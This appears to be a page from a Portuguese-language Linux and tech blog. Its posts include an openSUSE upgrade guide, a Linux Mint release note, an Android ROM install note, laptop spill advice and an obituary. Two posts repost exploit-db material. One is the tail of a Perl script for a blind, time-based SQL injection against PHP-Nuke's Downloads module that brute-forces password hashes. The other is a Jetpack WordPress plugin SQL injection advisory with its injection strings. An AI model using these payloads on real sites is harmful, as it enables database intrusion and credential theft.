    $Start = Time::HiRes::time();
    my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', {
                    title => "Dante90",
                    url => $Post,
                    description => "WaRWolFz Crew",
                    auth_name => "Dante90",
                    email => "dante90.dmc4@hotmail.it",
                    filesize => "1024",
                    version => "1",
                    homepage => "http://www.warwolfz.org/",
                    d_op => "Add"
                },
                Referer => $HostName.'modules.php?name=Downloads&d_op=Add');
    $Response->is_success() or die "$HostName : ", $Response->message, "n";
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}
sub usage {
    system("cls");
    {
        print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploitn";
        print " -------------------------------------------------------- n";
        print " * USAGE:                                               *n";
        print " * cd [Local Disk]:\[Directory Of Exploit]\             *n";
        print " * perl name_exploit.pl [victime]                       *n";
        print " -------------------------------------------------------- n";
        print " *          Powered By Dante90, WaRWolFz Crew           *n";
        print " *  www.warwolfz.org - dante90_founder[at]warwolfz.org  *n";
        print " ------------------------------------------------------- n";
    };
    exit;
}
sub refresh {
    system("cls");
    {
        print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploitn";
        print " -------------------------------------------------------- n";
        print " * USAGE:                                               *n";
        print " * cd [Local Disk]:\[Directory Of Exploit]\             *n";
        print " * perl name_exploit.pl [victime]                       *n";
        print " -------------------------------------------------------- n";
        print " *          Powered By Dante90, WaRWolFz Crew           *n";
        print " *  www.warwolfz.org - dante90_founder[at]warwolfz.org  *n";
        print " ------------------------------------------------------- n";
    };
    print " * Victime Site: " . $_[0] . "n";
    print " * Default Time: " . $_[1] . " secondsn";
    print " * BruteForcing Hash: " . chr($_[2]) . "n";
    print " * BruteForcing N Char Hash: " . $_[5] . "n";
    print " * SQL Time: " . $_[4] . " secondsn";
    print " * Hash: " . $_[3] . "n";
}

#WaRWolFz Crew

 

Fonte: http://www.exploit-db.com/exploits/18148/

Como atualizar seu OpenSuse 11.4 para 12.1 sem problemas.

Standard

Bom pessoal, antemão queremos ressaltar que o procedimento é rápido (só depende do seu link de internet) e simples de proceder. Bora simbora?

Vamos analisar os repositórios ativos (no meu caso tinham MUUUUUUUUUUUUUUUUUITOS, abaixo seguem somente os default), para isso use o comando:

zypper repos –uri

A resposta deverá ser:

# | Alias                            | Name                             | Enabled | Refresh | URI
--+----------------------------------+----------------------------------+---------+---------+------------------------------------------------------------------------------------------------
1 | Updates-for-openSUSE-11.4-11.4-0 | Updates for openSUSE 11.4 11.4-0 | Yes     | Yes     | http://download.opensuse.org/update/11.4/
2 | openSUSE-11.4-11.4-0             | openSUSE-11.4-11.4-0             | Yes     | No      | cd:///?devices=/dev/disk/by-id/ata-VMware_Virtual_IDE_CDROM_Drive_10000000000000000001,/dev/sr0
3 | repo-debug                       | openSUSE-11.4-Debug              | No      | Yes     | http://download.opensuse.org/debug/distribution/11.4/repo/oss/
4 | repo-debug-update                | openSUSE-11.4-Update-Debug       | No      | Yes     | http://download.opensuse.org/debug/update/11.4/
5 | repo-non-oss                     | openSUSE-11.4-Non-Oss            | Yes     | Yes     | http://download.opensuse.org/distribution/11.4/repo/non-oss/
6 | repo-oss                         | openSUSE-11.4-Oss                | Yes     | Yes     | http://download.opensuse.org/distribution/11.4/repo/oss/
7 | repo-source                      | openSUSE-11.4-Source             | No      | Yes     | http://download.opensuse.org/source/distribution/11.4/repo/oss/

Vamos ativar o repositório updates for opensuse 11.4 11.4-0 com o seguinte comando:

zypper modifyrepo –enable Updates-for-openSUSE-11.4-11.4-0

Logo em seguida, validar o repositório (URI):

zypper addrepo –check –name ‘openSUSE-11.4-Update’ http://download.opensuse.org/update/11.4/ repo-update

Hora de deixar tudo novinho antes da upgrade:

zypper refresh

zypper update

 

Depois que tudo estiver atualizado na atual versão deveremos fazer o seguinte:

zypper modifyrepo –all –disable

Isso vai desativar tudo quanto for repositório antigo (11.4).

Hora de ativar todos os repositórios novos:

zypper addrepo –name “openSUSE-12.1 OSS” http://download.opensuse.org/distribution/12.1/repo/oss/ repo-12.1-oss
zypper addrepo –name “openSUSE-12.1 Non-OSS” http://download.opensuse.org/distribution/12.1/repo/non-oss/ repo-12.1-non-oss
zypper addrepo –name “openSUSE-12.1 Updates” http://download.opensuse.org/update/12.1/ repo-12.1-update

Hora do FATALITY:

zypper ref

zypper dup

 

Depois disto dê reboot (no console mesmo):

reboot

 

Quando inicializar já virá com gnome-shell.
Aqui está ok (brilho, som), mas a wifi foi para o espaço.
Iremos fazer um artigo com a correção.

WordPress jetpack plugin SQL Injection Vulnerability

Standard

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: WordPress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
######################################################
*DESCRIPTION
Discovered a vulnerability in  jetpack, WordPress Plugin,
vulnerability is SQL injection.
File:wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][MID((VERSION()),1,6)

 

Fonte: http://www.exploit-db.com/exploits/18126/

Lançado novo Linux Mint 12 (RC1)

Standard

Veja nota:

The first release candidate for Mint 12, an Ubuntu-based distribution with a choice between a highly customised GNOME 3 and MATE (a fork of GNOME 2) desktops, is out and ready for testing: “The team is proud to announce the release of Linux Mint 12 ‘Lisa’ RC. Linux Mint 12 is a new step forward, using new technologies and a brand new desktop, built with GNOME 3 and Mint GNOME Shell Extensions (MGSE). MGSE is a desktop layer on top of GNOME 3 that makes it possible to use GNOME 3 in a traditional way. You can disable all components within MGSE to get a pure GNOME 3 experience, or you can enable all of them to get a GNOME 3 desktop that is similar to what you’ve been using before. The main features in MGSE are: the bottom panel, the application menu, the window list, a task-centric desktop (i.e. you switch between windows, not applications), visible system tray icons.” Read the release announcement and check out the what’s new page for more detailed information and screenshots. Download (SHA256): linuxmint-12-gnome-dvd-32bit-rc.iso (1,025MB, torrent), linuxmint-12-gnome-dvd-64bit-rc.iso (1,014MB, torrent).

cm71-111108.0452-NIGHTLY-Milestone2-ICS-v2.0.zip liberado e pronto para Download (estamos testando)

Standard

PessoALL, estamos testando a nova rom cm71-111108.0452-NIGHTLY-Milestone2-ICS-v2.0.zip da galera da XDA. (11/11/11) (a cara do Ice Cream Sandwitch)

Breve iremos detalhar aqui a experiência desta nova rom.

Para baixar a mesma acessem:

cm71-111108.0452-NIGHTLY-Milestone2-ICS-v2.0.zip

 

Testamos aqui (exatamente há 15 minutos) – são 14:04 do dia 12/11/2011.

Para nós que já fizemos o procedimento de atualização do Milestone 2 para android gingerbread basta apenas baixar esta rom do link acima citado e seguir os passos assim:

1 – Solicitar o Reboot do aparelho optando por Recovery,

2 – (depois de ter colocado o arquivo baixado dentro do aparelho (por meio de cabo de dados ou afins [recomendamos cabo de dados]) escolha a opção de instalar vindo de um ZIP file, escolher a pasta aonde está a rom e mandar instalar.

3 – Dar wipes (OS 2),

Por fim rebootar.

Aqui conosco levou 3 minutos e o aparelho subiu.

Lembrando que fizemos com a bateria completinha (caso desse algum problema poderíamos usar os procedimentos de recuperação do milestone 2).
Abraços galera.
Por enquanto ainda não testamos muitas coisas, mas o aparelho está mais leve ;).

 

PS: 2:20 hs em ligação e NÃO caiu!

Links ok (acesso por 3g) e Ponto de Acesso Wifi OK!

COOL!

Sem reboots desde as 2:24 da tarde 😛

O que fazer quando cair água, álcool ou líquidos malucos no teclado do seu notebook (notebook comum ou macbook)?

Standard

Tem gente que fica pirada X 100 quando se depara com uma situação maluca como esta, veja-se nisto:

—-> Estamos batendo papo, derrepente eu, sem querer, é claro, derrubo um copo com água, ou um recipiente com álcool vira sobre o teclado do seu notebook, e de prache seu teclado começa a repetir teclas com 6, z e etc.

O que fazer para parar o efeito do “teclado drogado”?

– Primeira coisa a fazer é ARRANCAR a bateria do seu notebook/macbook (sim, isto é MAIS QUE NECESSÁRIO),

– Segunda coisa a se fazer é virar o notebook de cabeça para baixo, deixando ele aberto por 24 HORAS! (sim, na verdade recomendaria 48 horas).

 

Depois disso seu teclado estará novinho em folha.
Caso não esteja ferrou com cirtcuitos do teclado e THE END, só autorizada.

Essas horas de cabeça para baixo fazem com que todo o líquido desça para a superfície do teclado.
O tempo desligado é o tempo de secagem (arrancar a humidade).

Cool ;).

Equipe AppUnix agradece.

Morre André Gondin, uma autoridade do Ubuntu no Brasil

Standard

Morreu aos 24 anos um dos ícones do Software Livre no Brasil: André Gondin.

André era um dos líderes da tradução do Ubuntu para o Pt-BR e fazia parte do Conselho Ubuntu Brasil, além de escrever em diversos blogs de Linux e Software Livre.

Leia a matéria que Gleidson Lacerda escreveu sobre André Gondin abaixo:

“André Gondim, deixa esposa, pais, família, amigos, colegas, fãs. Lutou contra a fibrose cistica desde criança, deram 8 meses, 2 anos, 5 anos… aos 24 veio o transplante e ele sobreviveu (casou-se com Ana Luiza no mesmo ano).

Graduou-se, estava posgraduando. Trabalhou em empresas de primeira linha como UOL e Terra (até quebrou meu galho e tirou minhas férias na Gfarias). Deu cursos, palestras, militou no software livre. O Ubuntu, Gnome e tantos outros projetos devem muito das traduções e coordenação de equipe de André.

 

Para continuar lendo veja:

http://aurelianomartins.wordpress.com/2011/11/03/morre-andre-gondin-um-dos-icones-do-ubuntu-no-brasil/